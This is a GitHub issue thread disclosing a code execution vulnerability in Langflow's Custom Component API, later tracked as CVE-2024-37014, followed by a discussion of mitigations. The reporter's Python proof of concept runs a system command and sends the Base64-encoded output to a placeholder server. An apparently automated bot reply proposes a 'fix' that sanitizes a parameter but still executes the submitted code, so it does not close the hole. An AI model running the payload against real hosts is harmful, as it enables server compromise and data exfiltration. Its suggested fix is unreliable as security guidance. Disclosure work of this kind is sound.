[Security Issue] Code Execution against underlying host system in Custom Component

0xfatty commented 5 months ago

Quick note: Langflow is a very interesting and useful framework for anyone working on AI projects, and personally it's a cool project to learn from. The Custom Component feature appears to have been launched to support user-defined Python scripts that use the library Langflow provides, which is a great feature. However, its documentation in [1] and [2] does not seem to mention any potential security issues, so the following finding was likely not expected.

[1] https://docs.langflow.org/components/custom
[2] https://docs.langflow.org/guidelines/custom-component

Describe the bug

The Custom Component feature lets users provide their own Python scripts built on the `CustomComponent` class from the Langflow library. This is excellent for local testing and experimentation. However, if the framework is hosted online, a bad actor can submit arbitrary Python code and gain code execution on the hosting server.

Impacted API: `POST /api/v1/custom_component`

Browser and Version

Browser: Tested on Chromium
Version: 125.0.6422.60 (Official Build) (arm64)

To Reproduce

Steps to reproduce the behavior:

1. Create a new project.
2. Add a Custom Component and, inside its `Component` class, provide the following Python code:

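```python
import base64
import subprocess

import requests  # used below but missing from the original snippet
from langflow.custom import CustomComponent


class Component(CustomComponent):
    # This code sits directly in the class body, so it runs as soon as the
    # server evaluates the class definition.
    def execute_and_send():
        # Execute an arbitrary system command
        result = subprocess.run(["uname", "-a"], capture_output=True, text=True)
        if result.stderr:
            print("Error:", result.stderr)
            return

        # Base64-encode the output
        encoded_output = base64.b64encode(result.stdout.encode()).decode()

        # Send it out in a GET request with the Base64 string as a query parameter
        url = f"https://your_server/?data={encoded_output}"
        requests.get(url)

    execute_and_send()
```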

Clicking **Check & Save** invokes the `/api/v1/custom_component` API to process the submitted Python script, which results in OS command execution. The output is Base64-encoded and sent to a malicious server.
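Why does merely saving the component run the payload? A minimal sketch, assuming the backend evaluates the submitted source with Python's built-in `exec` (the exact Langflow code path is not shown in this issue): statements in a class body run as soon as the class definition is executed, so the server never has to call the component. `load_component` and `SOURCE` are hypothetical names, and the "payload" here only appends to a list.

```python
# Hypothetical illustration, not Langflow's actual loader: executing a class
# definition also executes every statement in its body.
executed: list[str] = []

SOURCE = '''
class Component:
    def side_effect():
        executed.append("class body ran")
    side_effect()  # called while the class body is being evaluated
'''


def load_component(source: str, namespace: dict) -> type:
    # Merely defining the class is enough to trigger side_effect()
    exec(source, namespace)
    return namespace["Component"]


cls = load_component(SOURCE, {"executed": executed})
print(executed)  # ['class body ran']
```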


Additional context

The vulnerability allows arbitrary code execution by injecting malicious code through the Custom Component feature. This could lead to significant security risks, including data theft, unauthorized access, and potential disruption of services, especially when the framework is hosted publicly.

dosubot[bot] commented 5 months ago

Hey @0xfatty, I'm here to help you with any bugs, questions, or contributions you have in mind. Let's get started!

To address the security vulnerability in the Custom Component feature of the Langflow framework that allows for arbitrary code execution when hosted online, you should implement input validation and sanitization. Additionally, you can leverage the existing structure of the Component class to ensure that the code provided is safe and does not contain malicious elements.

Here is an example of how you can modify the build method to include input validation and sanitization, while also utilizing the existing Component class structure:

```python
import re
from langflow.custom import CustomComponent
from langflow.schema import Record
from langflow.custom.eval import eval_custom_component_code  # imported but never used below
from langflow.utils import validate

# NOTE: ComponentCodeNullError and ComponentFunctionEntrypointNameNullError are
# raised below but not imported in this snippet; they are assumed to be defined
# in Langflow's base component module.

class Component(CustomComponent):
    display_name = "Custom Component"
    description = "Use as a template to create your own component."
    documentation: str = "http://docs.langflow.org/components/custom"
    icon = "custom_components"

    def build_config(self):
        return {"param": {"display_name": "Parameter"}}

    def build(self, param: str) -> Record:
        # Basic input validation
        if not isinstance(param, str):
            raise ValueError("Parameter must be a string")

        # Remove every character that is neither a word character nor whitespace
        sanitized_param = re.sub(r'[^\w\s]', '', param)

        # Ensure there is code and an entrypoint before building the function.
        # Note: only `param` was sanitized above; `self.code` itself is not inspected.
        if not self.code:
            raise ComponentCodeNullError(
                status_code=400,
                detail={"error": self.ERROR_CODE_NULL, "traceback": ""},
            )

        if not self._function_entrypoint_name:
            raise ComponentFunctionEntrypointNameNullError(
                status_code=400,
                detail={
                    "error": self.ERROR_FUNCTION_ENTRYPOINT_NAME_NULL,
                    "traceback": "",
                },
            )

        custom_function = validate.create_function(self.code, self._function_entrypoint_name)
        result = custom_function(sanitized_param)

        return Record(data=result)
```

In this example:

- The `build` method checks whether `param` is a string.
- It sanitizes the input with a regular expression that removes every character that is neither a word character nor whitespace.
- It validates and executes the custom component code safely by leveraging the existing Component class methods.

This approach helps mitigate the risk of arbitrary code execution by ensuring that the input is safe before processing it and by using the existing validation mechanisms provided by the Langflow framework ^[1]^[2].
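To see what the sanitization step actually does, here is the same regular expression applied to a shell-like string (`sanitize` is a hypothetical helper name). It strips punctuation from `param`, but nothing in it inspects or restricts the component source that is then turned into a function and run.

```python
import re


def sanitize(param: str) -> str:
    # Same pattern as in the build() example: drop every character that is
    # neither a word character (letter, digit, underscore) nor whitespace.
    # For str patterns, \w is Unicode-aware, so non-ASCII letters are kept too.
    return re.sub(r"[^\w\s]", "", param)


print(sanitize("rm -rf /; echo $HOME"))  # rm rf  echo HOME
```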


0xfatty commented 5 months ago

Thank you for your prompt response and suggestion to address the security vulnerability by implementing input validation and sanitization. However, I'd like to clarify that the core issue lies in the context of the entire Langflow framework being hosted publicly, rather than the safety of individual published components.

The vulnerability arises because the framework allows users to create and execute their custom components on a publicly accessible server. In this scenario, the risk is that a malicious user can upload a custom component containing arbitrary and potentially harmful code, which gets executed on the server.

Take the online playground that Langflow provides at https://huggingface.co/spaces/Langflow/Langflow as an example: using the same attack vector, I was able to execute OS commands against the underlying Docker container.

Sample output:

```
Linux r-langflow-langflow-6hjjdvt7-50f38-0g46r 5.10.205-195.807.amzn2.x86_64 #1 SMP Tue Jan 16 18:28:59 UTC 2024 x86_64 GNU/Linux

total 88
drwxr-xr-x 1 user user    18 May 17 20:40 .
drwxr-xr-x 1 user user    62 May 25 12:46 ..
drwxr-xr-x 8 user user   178 Apr 12 11:49 .git
-rw-r--r-- 1 user user  1477 Apr 12 11:49 .gitattributes
-rw-r--r-- 1 user user 73828 Apr 12 11:51 =0.6.12
-rw-r--r-- 1 user user   556 Apr 12 11:49 Dockerfile
-rw-r--r-- 1 user user  1209 Apr 12 11:49 README.md
drwxr-xr-x 2 user user    26 May 17 20:40 logs
```

YamonBot commented 5 months ago

We also anticipated encountering similar issues when implementing Whisper in Langflow, specifically when converting voice file inputs to Base64 within the component.

As you mentioned, if a malicious user gains access to a Langflow instance exposed to clients, they could include custom components containing such backdoor code (similar to the Hugging Face scenario you mentioned).

Given the recent pull request history showing an image output component, it seems likely that an input component field will be added soon. It would be ideal if file input and output handling were restricted solely to the input component level, preventing users from directly writing these operations in custom components. (Alternatively, Langflow could include a mechanism to directly validate the Base64 format.)

Additionally, I recently heard that the LF core team is refactoring using Casbin for RBAC. Fundamentally, beyond debug/build modes, Casbin's introduction will likely result in account-based API call control. This aspect should be emphasized in the manual to caution users accordingly. (At the product level, the example scenario you mentioned should be used to highlight the importance of disabling the AUTO LOGIN flag.)

Similarly, regarding https://github.com/langflow-ai/langflow/pull/1747, I think the approach of calling exec-like code, in addition to embedding such backdoors in the flow, is also risky. What are your thoughts on this?

0xfatty commented 5 months ago

Thank you for your detailed response and for acknowledging the potential risks associated with the Custom Component feature. I appreciate the proactive measures you are considering, particularly the introduction of file input and output handling restrictions and the refactoring with Casbin for RBAC. Here are my thoughts on the points you raised:

File Input and Output Handling:

Restricting file input and output operations to specific input components is a great step towards mitigating the risk of arbitrary code execution. By limiting these operations to controlled and validated components, you significantly reduce the attack surface. Validating the Base64 format directly at the component level is also a good way to ensure data integrity and security. However, Base64 is only one of many possible encodings, so a mechanism that blocks outbound calls from code submitted through this API would be more robust.

Casbin for RBAC:

The refactoring to include Casbin for role-based access control (RBAC) is a positive move. Beyond debug/build modes, implementing account-based API call control will enhance security by ensuring that only authorized users can execute certain actions. Emphasizing this in the documentation, especially with a focus on disabling the AUTO LOGIN flag, will help users understand the importance of these security measures. Using real-world scenarios, such as the one mentioned, can effectively highlight potential risks and encourage best practices.

Exec-like Code Risks:

Allowing exec-like code in custom components poses significant security risks, as it provides a direct method for attackers to execute arbitrary commands. Even with input validation and sandboxing, the inherent risk of arbitrary code execution remains high. I recommend considering the following additional measures:

- Script Execution Isolation: Use containerization (e.g., Docker) or sandboxing (e.g., Firejail) to isolate the execution environment of custom components, so that malicious code cannot affect the host system.
- Code Auditing and Approval: Implement a code review and approval process for custom components. This can be partly automated with static analysis tools that detect potentially harmful patterns before execution is allowed. For example, stop executing code submitted directly through this API; instead, require submitted code to pass review before the real account owner can invoke it.
- Restricting Imports and Libraries: Limit the libraries and modules that custom components can import. A predefined list of safe libraries prevents the use of potentially dangerous modules like subprocess or os.
- Execution Time and Resource Limits: Set strict execution time and resource limits (e.g., memory, CPU usage) for custom components to mitigate the risk of resource exhaustion attacks.
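The static-analysis and import-restriction ideas above could be sketched with Python's standard `ast` module: parse the submitted source without executing it, then flag any import outside an allowlist plus direct calls to `exec`, `eval`, `compile`, or `__import__`. `ALLOWED_MODULES`, `BLOCKED_CALLS`, and `find_disallowed` are hypothetical. A check like this is easy to evade (for example via `getattr` on builtins), so it only makes sense alongside the isolation and resource limits listed.

```python
import ast

# Hypothetical policy values, for illustration only.
ALLOWED_MODULES = {"langflow", "re", "json", "math", "typing"}
BLOCKED_CALLS = {"exec", "eval", "compile", "__import__"}


def find_disallowed(source: str) -> list[str]:
    """Return disallowed imports and dynamic-execution calls found in `source`.

    The source is only parsed, never executed.
    """
    problems: list[str] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            modules = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            # Relative imports (level > 0) get a leading dot, so they never match.
            modules = ["." * node.level + (node.module or "")]
        elif (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Name)
            and node.func.id in BLOCKED_CALLS
        ):
            problems.append(f"call:{node.func.id}")
            continue
        else:
            continue
        for module in modules:
            # Compare only the top-level package, e.g. "langflow" for "langflow.custom".
            if module.split(".")[0] not in ALLOWED_MODULES:
                problems.append(module)
    return problems


poc = "import subprocess\nimport base64\nfrom langflow.custom import CustomComponent\n"
print(find_disallowed(poc))  # ['subprocess', 'base64']
```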

I appreciate the efforts being made to enhance Langflow's security and am available to provide further insights or assistance as needed.

0xfatty commented 5 months ago

@yamonkjd I just added a commit publishing a security policy page: https://github.com/langflow-ai/langflow/pull/2000. The goal is to publish a CVE tracking number for this issue. I hope you can review and approve it, and publish an advisory for this.

YamonBot commented 5 months ago

lol, we are contributors to Langflow, not core members. I seem to have caused some confusion.

@ogabrielluiz Hey, could you please review this request?

0xfatty commented 5 months ago

CVE-2024-37014 has been assigned by MITRE to track this security issue.

carlosrcoelho commented 3 months ago

https://github.com/langflow-ai/langflow/issues/2908
